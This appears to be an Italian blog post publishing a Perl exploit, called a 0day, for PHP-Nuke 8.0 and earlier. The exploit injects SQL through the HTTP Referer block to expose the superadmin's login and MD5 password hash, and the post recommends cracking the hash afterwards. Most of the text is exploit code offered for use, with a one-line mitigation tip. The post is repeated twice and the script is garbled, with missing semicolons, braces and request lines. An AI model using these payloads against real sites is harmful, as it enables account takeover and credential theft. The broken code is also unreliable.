Un pericoloso bug affligge tutte le versioni di PHP-NUKE, il bug sottostante è nell’index.php, dopo aver fatto girare il nostro exploit, il blocco referenti ci mostrerà il l’user e la password dell’admin criptata in hash md5. Successivamente non vi resta che usare il cracker md5 di Milw0rm per crackare la password.
$db->sql_query(”INSERT INTO “.$prefix.”_referer VALUES (NULL, ‘”.$referer.”‘)”)
Questa è una 0day, non è ancora stata fixata, l’unico consiglio che posso dare ai meno esperti è quello di togliere il blocco referenti, invece chi è pratico di PHP con poche modifiche al codice può tappare questa enorme falla.
Codice exploit:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl \n"; print "\t[url]-vicitim webpage with index.php\n"; print "Example:\n"; print "\tperl exploit.pl http://phpnuke.org/index.php\n"; exit(0) } Happy Testing!
$db->sql_query(”INSERT INTO “.$prefix.”_referer VALUES (NULL, ‘”.$referer.”‘)”)
Questa è una 0day, non è ancora stata fixata, l’unico consiglio che posso dare ai meno esperti è quello di togliere il blocco referenti, invece chi è pratico di PHP con poche modifiche al codice può tappare questa enorme falla.
Codice exploit:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl \n"; print "\t[url]-vicitim webpage with index.php\n"; print "Example:\n"; print "\tperl exploit.pl http://phpnuke.org/index.php\n"; exit(0) } Happy Testing!